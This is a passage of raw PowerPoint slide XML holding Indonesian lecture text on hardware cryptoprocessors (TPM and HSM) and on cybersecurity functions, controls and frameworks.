              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninggalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptoprosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Modul Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (TPM) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>modul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CPU pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mobile. TPM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproduksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1.2 dan 2.0 yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1.2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Modul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (HSM) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptoprosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> adaptor PCIe plug-in, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> USB. HSM juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2853924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Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventarisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hasil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>macam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memandu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelamatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
